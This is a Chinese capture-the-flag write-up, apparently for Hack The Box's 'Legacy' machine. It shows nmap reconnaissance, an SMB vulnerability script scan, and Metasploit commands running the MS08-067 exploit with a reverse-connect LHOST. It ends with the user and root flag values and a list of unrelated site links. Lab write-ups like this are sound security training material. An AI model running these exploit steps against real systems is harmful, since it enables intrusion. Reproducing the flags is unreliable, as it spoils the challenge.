当前位置: 首页 > news >正文

[Meachines] [Easy] Legacy nmap 漏洞扫描脚本深度发现+MS08-067

news 来源:原创 2024/9/20 5:26:57

信息收集

IP AddressOpening Ports
10.10.10.4TCP:135,139,445

$ nmap -p- 10.10.10.4 --min-rate 1000 -sC -sV -Pn

PORT      STATE    SERVICE      VERSION
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Windows XP microsoft-ds
1715/tcp  filtered houdini-lm
2790/tcp  filtered plgproxy
3485/tcp  filtered celatalk
4181/tcp  filtered macbak
8317/tcp  filtered unknown
16417/tcp filtered unknown
35682/tcp filtered unknown
37634/tcp filtered unknown
59296/tcp filtered unknown
59458/tcp filtered unknown
62000/tcp filtered unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xpHost script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-08-28T14:59:28+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:2b:f1 (VMware)
|_clock-skew: mean: 5d00h18m08s, deviation: 2h07m16s, median: 4d22h48m08s

nmap 漏洞扫描脚本深度发现 & MS08-067

$ nmap --script smb-vuln* -p 445 10.10.10.4

image.png

MS17-010 和 MS08-067似乎存在这个系统

$ msfconsole

msf6 > use exploit/windows/smb/ms08_067_netapi

msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.16.24

msf6 exploit(windows/smb/ms08_067_netapi) > run

image-1.png

附录:

可以通过上传whoami.exe来执行用户名查询

image-3.png

image-2.png

User.txt

e69af0e4f443de7e36876fda4ec7644f

Root.txt

993442d258b0e0ec917cae9e695d5713

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Java编程:单一职责原则
  • 辨析sizeof() 和strlen函数(包含相关二级习题)
  • html+css+js网页设计 电商 折扣社7个页面
  • [000-01-011].第2节:持久层方案的对比
  • 鸿蒙(API 12 Beta3版)【使用ImageEffect编辑图片】图片开发指导
  • CSM数采系统助力高压动力系统的效率测量
  • 计算机四级必背-操作系统
  • 探索上门回收旧衣物系统源码开发的创新与挑战
  • Flutter Listview 缓存item滑动后不进行重新渲染
  • “论面向服务架构设计及其应用”写作框架,软考高级,系统架构设计师
  • Selenium与Web Scraping:自动化获取电影名称和评分的实战指南
  • 中级经济师考试通过率有多少?难度如何?
  • Android 架构模式之 MVP
  • 编程之路:从挫折到突破的心路历程
  • SQLite 插入一行并返回主键
  • 【剑指offer】让抽象问题具体化
  • 【腾讯Bugly干货分享】从0到1打造直播 App
  • 【跃迁之路】【735天】程序员高效学习方法论探索系列(实验阶段492-2019.2.25)...
  • 2019.2.20 c++ 知识梳理
  • Android 架构优化~MVP 架构改造
  • Computed property XXX was assigned to but it has no setter
  • css系列之关于字体的事
  • java8-模拟hadoop
  • JavaScript设计模式系列一:工厂模式
  • maya建模与骨骼动画快速实现人工鱼
  • Next.js之基础概念(二)
  • Octave 入门
  • PHP 程序员也能做的 Java 开发 30分钟使用 netty 轻松打造一个高性能 websocket 服务...
  • Redux系列x:源码分析
  • SpiderData 2019年2月16日 DApp数据排行榜
  • SwizzleMethod 黑魔法
  • Tornado学习笔记(1)
  • TypeScript迭代器
  • vue 配置sass、scss全局变量
  • vue从入门到进阶:计算属性computed与侦听器watch(三)
  • XML已死 ?
  • 开放才能进步!Angular和Wijmo一起走过的日子
  • 聊聊flink的BlobWriter
  • 前端技术周刊 2019-01-14:客户端存储
  • 区块链分支循环
  • 如何优雅的使用vue+Dcloud(Hbuild)开发混合app
  • 使用putty远程连接linux
  • python最赚钱的4个方向,你最心动的是哪个?
  • 你学不懂C语言,是因为不懂编写C程序的7个步骤 ...
  • ​2020 年大前端技术趋势解读
  • # 安徽锐锋科技IDMS系统简介
  • #if和#ifdef区别
  • (09)Hive——CTE 公共表达式
  • (1)(1.13) SiK无线电高级配置(六)
  • (第二周)效能测试
  • (二)丶RabbitMQ的六大核心
  • (附源码)springboot 个人网页的网站 毕业设计031623
  • (附源码)springboot电竞专题网站 毕业设计 641314
  • (十一)图像的罗伯特梯度锐化
  • (四)Tiki-taka算法(TTA)求解无人机三维路径规划研究(MATLAB)